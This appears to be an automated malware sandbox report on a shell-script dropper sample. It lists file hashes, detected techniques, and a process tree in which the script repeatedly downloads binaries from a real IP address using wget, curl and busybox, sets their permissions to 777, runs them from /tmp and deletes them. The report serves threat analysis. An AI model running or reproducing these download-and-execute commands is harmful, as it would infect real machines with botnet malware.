Analysis
-
max time kernel
90s -
max time network
92s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mips image:debian9-mipsbe-20240418-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
18/10/2024, 01:49
Static task
static1
Behavioral task
behavioral1
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
-
Size
10KB
-
MD5
9a652a59ec3ea4f4b578b2c9f0e9c25c
-
SHA1
8c2b441f097c1f3c910ef9adb5b6816ddd60213b
-
SHA256
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19
-
SHA512
c68e93af48af16ba88fb94f6a8a874da524ac9fd19cb25abf57ac44b802ad1c202783ccdaca8d1876e6b4fcbec0b9f2080c1b06d78f60845281d78bb3b2b2216
-
SSDEEP
192:g3P87X+A6ZsXTqpx+PiAX0kvXTqpx73P87X6M0kXf:eA0YP5/
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Reads runtime system information
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh1⤵PID:731
-
/bin/rm/bin/rm bins.sh2⤵PID:733
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:739
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:754
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:761
-
-
/bin/chmodchmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:765
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:766
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:767
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:768
-
-
/bin/chmodchmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Executes dropped EXE
PID:770
-
-
/bin/rmrm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:771
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:772
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:780
-
-
/bin/chmodchmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:789
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:791
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:808
-
-
/bin/chmodchmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:828
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:829
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:831
-
-
/bin/chmodchmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:834
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:835
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:841
-
-
/bin/chmodchmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:850
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:852
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:867
-
-
/bin/chmodchmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:879
-
-
/bin/chmodchmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:888
-
-
/bin/chmodchmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:894
-
-
/bin/chmodchmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:900
-
-
/bin/chmodchmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:906
-
-
/bin/chmodchmod 777 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD./suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:912
-
-
/bin/chmodchmod 777 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA./3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:918
-
-
/bin/chmodchmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:924
-
-
/bin/chmodchmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:930
-
-
/bin/chmodchmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:936
-
-
/bin/chmodchmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:942
-
-
/bin/chmodchmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:948
-
-
/bin/chmodchmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:954
-
-
/bin/chmodchmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:960
-
-
/bin/chmodchmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:966
-
-
/bin/chmodchmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:972
-
-
/bin/chmodchmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:978
-
-
/bin/chmodchmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:981
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:982
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:984
-
-
/bin/chmodchmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:987
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:988
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:989
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:990
-
-
/bin/chmodchmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- File and Directory Permissions Modification
PID:991
-
-
/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Executes dropped EXE
PID:992
-
-
/bin/rmrm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:993
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:994
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:995
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:996
-
-
/bin/chmodchmod 777 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD./suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:999
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:1000
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:1002
-
-
/bin/chmodchmod 777 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- File and Directory Permissions Modification
PID:1003
-
-
/tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA./3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Executes dropped EXE
PID:1004
-
-
/bin/rmrm 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:1005
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97